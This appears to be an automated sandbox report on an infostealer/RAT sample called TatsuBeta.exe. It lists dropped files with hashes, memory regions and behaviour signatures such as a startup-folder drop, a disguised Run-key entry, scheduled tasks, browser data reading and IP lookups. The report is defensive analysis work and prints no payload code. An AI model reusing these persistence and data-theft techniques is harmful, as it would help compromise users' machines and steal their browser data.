SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\resources\app.asar

MD5 5860404f6a939acefc2a6dd4a78551fd
SHA1 c9c499c29f18d2827753d3e207b09c588c87c417
SHA256 c10edc53003c2729a333f89d9bf68603f4992148398aa278fca02ccb1344a5cd
SHA512 936f16a94203ae61d668c3ef77fc500bee6d91584d86d643454d9033fa9ba275151e10b1a9c3b42ca2aca6fdf2d8b8f99ea5bb52f359947f5fb225458d230b6d

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 793249b2660497ec71f813056bbfdc8d
SHA1 88528046d37237a4643fd0dd5e5fe638118ee900
SHA256 747bb7f0a023ea7e3aff8281db89c98c6e62904a7ace7b2e7d20beb97b355fa2
SHA512 165abe2b58e6cdee02e2b83e708607976beef768528c363bf6893ee905e3bb6c555398f87b0d0dd31b8b7e2e1ddb9b4b36c5aaf3711a332f50099f790515f0ef

\Users\Admin\AppData\Local\Temp\nsf9FFA.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 5c4cec1ffe2402e6c3a30aba395543ad
SHA1 706758b55255f893d12d733095734b6263c2a256
SHA256 4a926705d2b45c5d0e7dc961ccfa7302dfece153ac01ee7ca7962cc2b5938902
SHA512 ba02dd68e4a191491cbf2dba36fab3d27c90db9ed023cebd462f22697cc4056a70748ee2161af6268dae0d00671f97598f3de2433d4ea57f04af8e9df18d7631

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 71191642fe38aff2b467c3b7d8e565f7
SHA1 f8b39d8ac462d6d67039fe693a5c6467a8a7bbc1
SHA256 46297f33fb7ac35a67ad82b58b43e85a078c750ecb729f5602ad3c060bd44453
SHA512 2ab4722edf543866c3825e28e3749cf8214f5851cd95bb000ae83eac719d2d9da98d6776718d8002c3c08ee1ce1d758c54873c063baa6c265c60c9eace3928b7

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 df384cb269d410d5848b9846aef217c9
SHA1 e62f9179481d5d37ff9ccbcf50dc36b5171a2474
SHA256 e5076d6bf111493db117665e2aeb4a946b399a45baaacfb1318352fdd3bee13f
SHA512 c82a1f2562bbcc109460581bed11f37ceda593baae5e23bc86b4739c7871a587b1ae1e67338a3025238b5d14c7b11a97f5b3bce7ec0b6228c4a8d717ef56608b

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\v8_context_snapshot.bin

MD5 47014c0f81bad6d216c617c9c63bf040
SHA1 7bb483fdc5fed3c6ed437d9fe6e5023bc38201bf
SHA256 e1249d05bfc73c645b27d269f47b6923b33a3cf8088a8ca78b3b637c90f58178
SHA512 052d86cf3305a9e493bd2472e6b7ddab5e0291efd6d899984a79bae46e5fa4bd21157e19ab4a2591c9cff9069de568bad18c7baf4f35d117c77134e635466f87

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\icudtl.dat

MD5 b3c827617b2767bbf5aa9beb0058217a
SHA1 2e6f4a62c52c662adc53ff091d256d488025f9c5
SHA256 060c8628d906d23cefbce8b41dc83d9e7536533993dbe5498bbed6f3ab11f238
SHA512 6e98c1b11f34028a8e57a649758100687ce77f4806d68fe20d2e0ab053cc4c164798efc7360787dc5e95fb65ede4e889afe457dcc484ffa9a4b3021aa92d0e87

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar

MD5 8b1fb3180d18e3882a98b92199df298c
SHA1 688fc5bb651bad36d28a957d3c1404779f809879
SHA256 a7af44c40bb1c655fdbc3ed26002fbc42ccce6ea707fab0eb970b964f46eca6d
SHA512 5d1506bdb5326dd138f1012614631774a31290aa2b6d0835acdd0410fb6603b1f0274be3f3a58805bb8e141322bdc0f0c854b4aa142179484b31e2ede3cec192

\Users\Admin\AppData\Local\Temp\47b246b6-5374-4e47-930e-e82c352e7403.tmp.node

MD5 9861ed72cfc0a6d242759cf7f16d3e38
SHA1 16fadd239e5fa6a0e9c978bc3ac5af48b91eaede
SHA256 69102f4fbc687b79d44c8def6dbf468aa4a3c1e8986774430773da213e8c5e2f
SHA512 a04ef3f077b6f386e885bbe2b411850614ef1a0876f3aa644974b2381c898425ab950c3109caa3106e2bf56faba8d9a629880403611fbc77fb2bbcfa1ba684d0

\Users\Admin\AppData\Local\Temp\cf019446-3de7-4056-ba6a-a75edbdb49b8.tmp.node

MD5 5317f23583ba935be25a4c26b3f93828
SHA1 bdc288a0576a9ca04295c2df6f71e260ae5097bc
SHA256 41db88f72dbc4ace9b4e6522b19f60e012980345fcb737cab1839ab0bb2f2cb3
SHA512 e3975f92f6bbd814cec4b6762b7f7475168dd43a717031de0d8055b7f5e4ce01dd011557c1301f9f9084f8a39248630c12f265a195c54c81f1efad9dd5bd91d0

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources.pak

MD5 dbfe4754d6d3ed120a04763726ae8b7c
SHA1 1ec5f3948a8f4621c10e44c436d4887fb5390395
SHA256 30a3a6dee7b83e252b4404ab4bfeccf903b8542ebaedf69d5a11dd7c37bceb09
SHA512 f4224c3ed4672a66476f7c3b6117ae352ba2fea6df09c88cec953a9790f8027aca3e3093cff1c198ab35a09d4a93d8ce099ead571ad4d613f60ae88fcee32c75

memory/3784-581-0x00007FFFE1850000-0x00007FFFE1851000-memory.dmp

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 454fef9fba7d58981887dca899b16d88
SHA1 d0776115193948d7629281c5bc3b500f4cbd513e
SHA256 b74281e6ca0917e9f661888333f3931d95a5f022c439f42d801bd3e36451d2a1
SHA512 6a75261347d861fc84efde60df716d1a08a387452f4ac9e40bb709ce461e71c91afd6159a843045bd762929106d7808e52ae2291991fa3999259cfa271d936ea

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 e6c0390212cf226a4eeb4ae39a04a763
SHA1 8d9a3729a5e59bb18821b76c10e2e40b9c15acf9
SHA256 4675635723817060e29c452555f8d10d3e8e8934e431877b5dbf144ed167e904
SHA512 01dd0d71ecf07e061c23418866dc6575812523ac2e955782960ee3b045b2faff1c0fa8923e3b98ea12d73ceafbf55a2ebd9d7ecb07f2f1d6319f441d353e34eb

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 5bbf18b484fc6bb5a3ce1fcfea68be3c
SHA1 e79742fb95941271eb51d3d3d05f070cc03d8605
SHA256 48f99256be0ae65dcfcc2d77d4dd04de1a7bd6614a483011eeb173baf2f2af1f
SHA512 991a55c0b4e1a56519f1284918c68d458d4c1600be2d4b4261011011bbdb60206ba7c5400c82985446643cd4e04705f784dbe55efca87e3546d0258f8c8dbd8f

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\D3DCompiler_47.dll

MD5 e65f90fae6cd5742b536c4dd82844e65
SHA1 60655717f05743474c0bf1c6e9cf092ce4a8d4b2
SHA256 8e644c8e8a876ba85a3c264b8ce3c60b1e128dc5c5860b50832b6d61def02cc7
SHA512 9c9993002d476c6a1836a435daaedb9e3490a3abde8416f76ba6ebdb802bf0f10475e626a26ef332930b9454c51c3f8402dd01fca0ee2d856e46e61a3a2db318

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libglesv2.dll

MD5 9a180ea74a6495c5c2724944164a3e09
SHA1 6388789cd3c8b2a9c1d74253b53fcd5a5c01b099
SHA256 1e21f854c20ed3298a80203c9fe7b520c8b3a85ee90c8e0f2abc40f7ac0a759b
SHA512 51fc2962bd59ac8b2fadd7aca8cfb76355ab59370779756bc7cefe37a4c4de28c403ed7749ca97ade552c24c6447f647aaa59a4de75579dee57aed3c6729a308

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

MD5 5b6e22646b1fe66a666f9101e94f17cf
SHA1 b4592ca897a10b8d1224bb4aff9f01811599028f
SHA256 898511a68d469c4fed5234c1c97dd992d98b17bd08a123300e2611ca982c0a10
SHA512 776856b23427a3596925e91a9b211bddab0916387da04db94a1b273b24667d69ed96384a9e0414a91d1d4bc3d7a0447fa0963645507e1d7acde13a7dfb673fb3

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

MD5 a84a2457a35210c0c95e7deffcb3bdd5
SHA1 f4a53e0447fdf2ebce9c9090d7a2f8150ca5a19f
SHA256 26c3511514fe14c7f8dee56b525747084323e48591903aa871f54533231bf8f3
SHA512 c4caf385986ffb358e11d9018d64974463089d125fb7b9b106724edee435c5b43b875ef1b3b6a68ebe81296dee89f8dc1e44151852b7c64e34c948336d520d65

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libEGL.dll

MD5 8aa1bd91863933e6c48e0607021f0963
SHA1 8a1293774f012bed1e0f8f81c9c99e37f70d3b30
SHA256 b8ab0be2037f20938463f443b661e80bf8857eb704fe3ca995b95156be5d4ef5
SHA512 27c5a87676f82d85a408a85d6cc90bf4151e16e03074b554d7279dbb3c2df8e5d15bb0561c07ee9790226c5bd0a2d4c98a3ca44359d330bc9d4cb98c6ad14c95

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 8a97c6849600fff729ef6c0b0365a103
SHA1 290dd9eefa12973c8b3097421d02d2549ce9d3ee
SHA256 195a084153b6725e66282af4a9c32856b42f2dd2d4ec6c631c0fc8c259634f48
SHA512 5b062b1e4fb6a72806e5105b2f15b30aa596564fa1e3a02af22f34c408aef70dba4defb9b224a10c129bc32ca58e7d5bc1eee7b86bea11d4ca8a9f3fb4ffd7f6

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 c50c3f1613b59fa9245fc46a8ba8afe2
SHA1 991ccd1edbbf73301f9ddba7c7e2e157d990dbdb
SHA256 d60acf2af141f585f1415935cb2a92dce93b8dcbd3f8cd19d8f9693660464ee7
SHA512 cbc52754bdbbeb9b1e322bd381f5ef472ff731a5ff8b6197e99c7c2ded6e12cd92e30a6d73b2c4e983dc54ccdddb4a611c230756eae013e19d4e61d6f6481c1c

memory/4764-632-0x00000231AC0D0000-0x00000231AC0F2000-memory.dmp

memory/4764-638-0x00000231AC3A0000-0x00000231AC416000-memory.dmp

memory/4764-637-0x00000231AC190000-0x00000231AC1A0000-memory.dmp

memory/4764-635-0x00000231AC190000-0x00000231AC1A0000-memory.dmp

memory/4764-634-0x00007FFFC3910000-0x00007FFFC42FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hpexmvel.bna.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4764-653-0x00000231AC190000-0x00000231AC1A0000-memory.dmp

memory/4764-659-0x00007FFFC3910000-0x00007FFFC42FC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 17286868c0a043ae5d2ff5798b6a3163
SHA1 b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401
SHA256 40321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6
SHA512 e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1

memory/4684-666-0x00007FFFC3A20000-0x00007FFFC440C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fe3595bca65e02b5c385fa63166ee89f
SHA1 7827c6f2c20f29678e93ea80861d7d179d4a7fb4
SHA256 af790953801a9af41ec05e5484c82362f26596b84e9ece90d9436340e26e5c3c
SHA512 97b3ca6d21e8d78296af739bdb92da26b95fb56b5072b87f710aa6e550338fb273d5d42210b1a6540537d8bdc62465e621206424ef0f32c2d32cb4dd35021f55

memory/4684-668-0x0000020ED08F0000-0x0000020ED0900000-memory.dmp

memory/4684-687-0x0000020ED08F0000-0x0000020ED0900000-memory.dmp

memory/4684-690-0x00007FFFC3A20000-0x00007FFFC440C000-memory.dmp

memory/920-704-0x00007FFFC3A20000-0x00007FFFC440C000-memory.dmp

memory/920-705-0x000001E501930000-0x000001E501940000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b2f6be46cb368d96381cb47ec9bfc457
SHA1 6ba4b4ba4886eab981f912940e2e9c9afbc2ec21
SHA256 c466709e330efdd69f80a1cbfddeab225b052020f31c148a2a2df6f33db9c155
SHA512 d2e508a10eee5821fd100fc658dd8fd12ac6ea668abdae3467a0e84f53afd604b2a874f9d9538a1004dfa80ce90c77b07ea664d91d75a1b06ae7411bc3688d0a

memory/920-722-0x000001E501930000-0x000001E501940000-memory.dmp

memory/920-723-0x00007FFFC3A20000-0x00007FFFC440C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

MD5 358e6d21b154861536c42f68241e1178
SHA1 4b6b717caab7cbb87a153f1e7503f69e77e0e90a
SHA256 4e2065e95f3b2b055dc8c2ef623f7f548c9ddf0f8f8668df20a01703ce584c2b
SHA512 b42431259b68f4e5f3c197ec43b286853b7dd27494a0728ad93a1269222bdd0e4657c289557ce012a18fcbb778b5c9f996041dcf83cc7b882a098bb79d4bcc89

memory/5700-732-0x00007FFFC3A20000-0x00007FFFC440C000-memory.dmp

memory/5700-735-0x0000023A55360000-0x0000023A55370000-memory.dmp

memory/5700-734-0x0000023A55360000-0x0000023A55370000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 576939bcee772dae42243e56566f81bc
SHA1 fe02571449ed6f482614faa6d8f6ab7e285c8d14
SHA256 c81374cb993981fcb8835ffbc0219edb52631189f50c0820cc96888e20291273
SHA512 6671905865ab2fe2c3e7e25e69957f8d87d1496c1bc3e296eeb1f35ee2df6cd725171376e0ddf14944d70643da9eee009f50194fccde41f18f193e7681d6d0fc

memory/5700-755-0x0000023A55360000-0x0000023A55370000-memory.dmp

memory/5700-756-0x0000023A55360000-0x0000023A55370000-memory.dmp

memory/5700-759-0x00007FFFC3A20000-0x00007FFFC440C000-memory.dmp

memory/7352-766-0x00007FFFC3A20000-0x00007FFFC440C000-memory.dmp

memory/7352-768-0x0000022C72200000-0x0000022C72210000-memory.dmp

memory/7352-769-0x0000022C72200000-0x0000022C72210000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 93f7f52f9ad025649696decf75d401b9
SHA1 26abc672e876f7e23e88857fb5814e63e4e74cac
SHA256 72065c691aebe76eea8876e6f67b37d8c4478e4b344e8ebcd4b9db5b10740bde
SHA512 be7f3ef6766f4dc327f02b54a5216b15a2306fb18f021393703682d6f9bb1a4e8f9ddb79eeddb47e4deeef7602456e14be0ce6be32f06177b9148413d6df4779

memory/7352-790-0x0000022C72200000-0x0000022C72210000-memory.dmp

memory/7352-793-0x00007FFFC3A20000-0x00007FFFC440C000-memory.dmp

memory/7352-789-0x0000022C72200000-0x0000022C72210000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n69gspjk.default-release\places.sqlite_tmp

MD5 e4c931189b74c109b28719d4ebc68cbd
SHA1 547edf51a150bf6e4e175e12485131da8b10c8c4
SHA256 1032f5240fd07f1e928d4f886311a9f4a9ae5a3d32fd655afdeaa8ac35bac055
SHA512 27d926de13afc4961385165f430f13fde69fade6adf5b58a350d170ba4ca20c385c8307a4b30c0d5a6de75dddd3f382a9c21e7ccbee1576843cadec15b10553c

memory/7956-846-0x00007FFFC3A20000-0x00007FFFC440C000-memory.dmp

memory/7956-847-0x00000255E2B10000-0x00000255E2B20000-memory.dmp

memory/7956-849-0x00000255E2B10000-0x00000255E2B20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0fa91ac7cfe6b9e4cb13be1f7f0d7628
SHA1 9051f82b733ad36808012e386a2d20e28738631f
SHA256 b69be59cbebce4c78fd7d6363f615039d76594a8c202b81fb7c3e83381c133db
SHA512 fdd837f9f758ad9132d658af6869f534a8d3fd3d6954a9a4263b2d935e49ad7bc9863877d742e9079640c35ac10cefac824abb00f820e090c09dcf19066c269d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_f0lYcR.vbs

MD5 9e4da36a926630342e2bf8fcba00cd6c
SHA1 c904194dbf6e3402e6c7dd166cba83824f4c48c1
SHA256 9e7e4f1c31d36e0ac036b311c75f3076926ce8b3d9ac3c6f222e42488139d25c
SHA512 f40a1d32cb1736457870f78c3a46cc617ce5e6731d2b3d7c52daea7f37ac52080b2154a24047a92058bffa08bf75e043718b2982d3d9ad2f8b91a23078c059d3

memory/7956-868-0x00007FFFC3A20000-0x00007FFFC440C000-memory.dmp

memory/7956-867-0x00000255E2B10000-0x00000255E2B20000-memory.dmp

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 9ac39dc31635a363e377eda0f6fbe03f
SHA1 29fa5ad995e9ec866ece1d3d0b698fc556580eee
SHA256 9a2723c21fb1b7dff0e2aa5dc6be24a9670220a17ae21f70fdbc602d1f8acd38
SHA512 0799ae01799707b444fca518c3af9b91fda40d0a2c114e84bc52bd1f756b5e0d60f6fd239f04bd4d5bc37b6cdbf02d299185cd62410f2a514a7b3bd4d60b49fc

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png

MD5 9f74f11972c3c0b161832ffab541bf31
SHA1 e5841ba20a229cdeab85d30690509e649e848271
SHA256 8b74a0abdd566ffdf15891d6abd3537bffb0abce7f362c737c3de6752e136032
SHA512 b90f13eb65a4dcfdd596a7d9eba7c1ba5eb1a598e51107ce3dca07c0a0025469ab18c9958eff2b36f7e05a23f0d16d7d9d7c2321b8e1f2a456aaa7bec3ced0e8

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

MD5 192e90432fed0081abb25295d8f309c4
SHA1 5150e93061f39e26688afd60a04c0ab14b510d47
SHA256 3216d6864b4f8824b82eb887edf95436dac3bea3f7d43d8988a176e3f1f8e1b2
SHA512 9b9b3f85eb9f12ad1b4c8cfc5e672758d879e178179deb28e80e6c3b27871261bf6b52f9066850b5a7a2fd85012b5308eaf3dda882fa40febc9cf6b47f1a4f04

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png

MD5 271847949971c396f77beaab936b7ea2
SHA1 b32c5a7eec49aa07f8ae73feb990626010c4b850
SHA256 a55224cdf06a5c2b937ba400604501f8b6ec93bc2c1cff62aa2fd378d504c657
SHA512 a2e141f68143f370e2b82a1c9c7c4b1c5f6fc2cfc2ad94acb8c5c02237af56f83904beaff3240e20397f0edbdfadf8779c0bd54b2cf0c9899fef59343e31794a

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

MD5 2b67e47cb8da1058770fe41d8b947619
SHA1 9eb259b1d377a24a2b77a694cf31c23cef7b8eef
SHA256 46f616820751849512d2704ddb604666170d13315c4383b8c8611c3e1c2f594a
SHA512 27c0593d662df228e146c49af6da52e39523523af924cf95ba4890b1b42358b2b8df3cf2667d8f672eece4f7fe098574c4689677768dd54d3b872619c7b9ae55

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 04c23766134b234e85cc537b2162efb1
SHA1 45c48d9ca30a4580a682f025cc66331e49f6f158
SHA256 f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900
SHA512 d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 6bd4850afa0b8bc93e877ab2b95feb82
SHA1 82c5ece576005a3e8b659dffd407438efedc82ce
SHA256 856d320c704199fd9c85f16081ec5a2b1209a3203c532c7db5dac154fb2b1726
SHA512 3e2e5dd48c98e9987556a3a9d711cfbbd4e41309be429039d7967a7cecec6cd71804477cba5ff265f0fa092744eb5641551f23f9db8cc5c5b837b19bd3b435cc

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 9bbaaad5b200630964ae2aa4f403c9e2
SHA1 a31c32e132375548bd711e7bc6874eea164635d9
SHA256 cec33b4098f26734bfd86bf653b99589806fc10e0ee9522a6deb7aff0844f938
SHA512 56cd2e2c804809b0feb216363f151632237eaf0f47420ad0643da641d487f0be697ea284158a0f7cdf383bb462417429da3a91a0c705fd6604d7d3a9258b1d1a

Analysis: behavioral3

Detonation Overview

Submitted

2023-12-17 13:47

Reported

2023-12-17 13:51

Platform

win10v2004-20231215-en

Max time kernel

118s

Max time network

164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupmub5Xr = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\TatsuBeta.exe" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
